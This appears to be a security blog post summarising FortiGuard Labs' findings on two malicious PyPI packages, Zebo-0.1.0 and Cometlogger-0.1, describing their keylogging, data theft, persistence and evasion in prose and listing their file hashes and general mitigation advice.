Fortinet’s FortiGuard Labs has recently uncovered two highly malicious Python packages, Zebo-0.1.0 and Cometlogger-0.1, which serve as a sobering reminder of the evolving sophistication of cyber threats. These packages, discovered in November 2024, highlight the growing abuse of Python Package Index (PyPI) repositories to distribute malware disguised as legitimate software. This analysis provides cybersecurity professionals with a detailed understanding of their behavior, the associated risks, and actionable recommendations to mitigate these threats.
The Rise of Weaponized Python Code
Python has become a universal programming language due to its simplicity and extensive libraries. However, its accessibility also makes it an attractive platform for cybercriminals. Malicious actors exploit open-source ecosystems, using obfuscation techniques to conceal harmful payloads within seemingly legitimate code. Fortinet’s AI-driven open-source software (OSS) malware detection system identified these two malicious packages, which were designed for credential theft, unauthorized surveillance, and data exfiltration.
Dissecting the Zebo-0.1.0 Package
The Zebo-0.1.0 package showcases all the hallmarks of a well-designed malware with its ability to stealthily invade user systems. Its multi-functional approach to cybercrime includes the following tactics:
- Obfuscation Techniques: Zebo-0.1.0 employs complex obfuscation methods, such as encoding critical elements (e.g., server URLs) in hexadecimal format, to evade detection. This not only bypasses static code analysis tools but also makes manual inspection exceedingly difficult.
- Keylogging Capabilities: Using the
pynputlibrary, the malware logs user keystrokes, capturing sensitive data such as passwords and account credentials. These logs are locally stored and later uploaded to a remote Firebase database. - Screen Capture and Data Exfiltration: The malware periodically takes screenshots of the victim’s desktop and transmits them to a server for unauthorized access. The stolen information is then wiped from the victim’s machine to avoid detection.
- Persistence Mechanisms: Zebo-0.1.0 ensures it executes every time the system starts. This is achieved by embedding scripts into Windows Startup folders, making removal complex for non-technical users.
The malicious package leverages HTTP PUT requests to transmit sensitive data to a Firebase server. The encoded URLs used for data exfiltration further emphasize its advanced obfuscation capabilities.
Cometlogger-0.1: A Sophisticated Keylogger and Data Thief
Similar to Zebo-0.1.0, Cometlogger-0.1 demonstrates advanced malicious functionalities, though with additional features that pose significant threats to both individuals and organizations. Its key components include:
- Webhook Injection: The script dynamically prompts users to input webhook URLs, which are then hardcoded into Python files. This facilitates the theft of sensitive information, such as session tokens and cookies, and enables remote attackers to issue commands through webhook-based command-and-control (C2) operations.
- Information Theft: Cometlogger targets saved passwords, cookies, and browsing history from platforms like Instagram, Twitter, Discord, and TikTok. Cryptocurrency wallets are also a prime target, with the malware extracting wallet files from browser extensions and local storage.
- Anti-VM Detection: The malware includes virtualization detection mechanisms to identify if it is being analyzed in a sandbox or virtual machine environment. If detected, the malware terminates to avoid being studied.
- Fake Error Messages: To trick users into re-executing the malicious script, the malware displays misleading error messages. This increases its persistence on the victim’s machine.
By employing asynchronous execution, Cometlogger is capable of exfiltrating large volumes of data efficiently. Furthermore, it uses techniques like file encryption and runtime dynamic modification to evade detection by security tools.
Risks and Indicators of Compromise (IOCs)
Both Zebo-0.1.0 and Cometlogger-0.1 present significant risks to users and organizations:
- Obfuscation and Data Theft: Obfuscation techniques not only conceal malicious behavior but also make detection challenging for antivirus solutions. The stolen data can lead to identity theft, financial fraud, or unauthorized access to sensitive corporate resources.
- Persistence and Scalability: The ability of these scripts to embed themselves deeply within the operating system ensures that they remain operational over extended periods, increasing their potential impact.
Key IOCs:
- Zebo-0.1.0 Hash:
4aeb0211bd6d9e7c74c09ac67812465f2a8e90e25fe04b265b7f289deea5db21 - Cometlogger-0.1 Hash:
839d0cfcc52a130add70239b943d8c82c4234b064d6f996eeaae142f05cc9e85
Actionable Recommendations for Mitigation
For Detection:
- Antivirus Tools: Employ reputable security solutions capable of detecting obfuscated malware.
- Network Monitoring: Monitor outgoing traffic for suspicious connections, such as unauthorized HTTP PUT requests.
For Prevention:
- Code Review: Avoid running third-party scripts without a thorough review.
- User Education: Train employees to recognize phishing attempts and avoid interacting with unverified software.
- Secure Development Practices: Developers should rely on trusted repositories and integrate security tools to scan dependencies.
The emergence of malicious packages such as Zebo-0.1.0 and Cometlogger-0.1 underscores the critical need for enhanced vigilance within the cybersecurity community. These Python-based threats highlight how attackers exploit open-source ecosystems to distribute malware, often targeting unsuspecting developers and users. By adopting a multi-pronged security approach that combines detection, prevention, and education, organizations can safeguard their systems and data from such evolving threats.
As the cybersecurity landscape continues to evolve, awareness and proactive measures will remain key to combating sophisticated adversaries. Let this case study serve as a reminder of the importance of securing development environments and scrutinizing third-party dependencies.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.
